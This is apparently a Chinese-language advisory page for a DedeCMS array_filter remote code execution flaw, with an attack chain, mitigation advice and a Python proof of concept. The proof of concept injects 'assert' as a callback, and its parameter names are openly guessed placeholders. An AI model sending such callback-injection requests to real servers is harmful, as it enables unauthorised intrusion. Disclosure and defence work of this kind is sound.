CVE-2026-30694 CVSS 9.8 严重

CVE-2026-30694 DedeCMS array_filter远程代码执行漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30694

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

DedeCMS

漏洞概述

DedeCMS v5.7.118及之前版本存在严重安全漏洞。由于`array_filter`组件处理逻辑缺陷，未经认证的远程攻击者可构造恶意请求执行任意代码，完全控制服务器。

技术细节

该漏洞源于DedeCMS在处理用户输入时，未对传给`array_filter`函数的回调参数进行严格校验。`array_filter`是PHP内置函数，用于使用回调函数过滤数组。攻击者可利用参数污染或变量覆盖漏洞，将回调函数名指定为危险函数（如`assert`）。由于程序的黑名单过滤机制可被绕过，攻击者能注入恶意PHP代码。当`array_filter`处理数组时，触发回调函数执行，导致远程代码执行（RCE）。攻击者无需用户交互即可利用此漏洞，获取服务器权限，严重威胁系统安全。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标服务器运行的是DedeCMS且版本低于或等于5.7.118。

STEP 2

漏洞利用

攻击者构造包含恶意回调函数（如assert）的HTTP POST请求，发送至存在`array_filter`缺陷的接口。

STEP 3

代码执行

服务器端PHP处理请求时，调用`array_filter`并执行攻击者指定的回调函数，从而执行任意系统命令或PHP代码。

STEP 4

后渗透

攻击者利用获取的权限写入Webshell，进一步控制服务器或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    """
    Proof of Concept for CVE-2026-30694
    Demonstrates RCE via array_filter callback injection.
    """
    # Payload targeting the vulnerable component
    # The exact parameter name might vary based on the specific vulnerable endpoint
    payload = {
        # Injecting the callback function name (e.g., 'assert')
        "_FILTER[0]": "assert",
        # Injecting the argument to the callback (PHP code to execute)
        "_FILTER[1]": "phpinfo();",
        # Additional parameters required to reach the vulnerable code path
        "action": "vulnerable_action"
    }

    try:
        response = requests.post(target_url, data=payload)
        if "phpinfo" in response.text:
            print("[+] Exploit successful! Code execution detected.")
        else:
            print("[-] Exploit failed or target not vulnerable.")
    except Exception as e:
        print(f"[!] Error: {e}")

# Usage example
# exploit("http://target-url/vulnerable_endpoint.php")

影响范围

DedeCMS <= 5.7.118

防御指南

临时缓解措施

建议立即检查并升级DedeCMS至官方发布的修复版本。在升级前，可通过修改代码逻辑，将`array_filter`的回调参数限制为预定义的安全函数白名单，禁止动态传入用户控制的函数名。同时，检查服务器日志中是否存在异常的代码执行记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表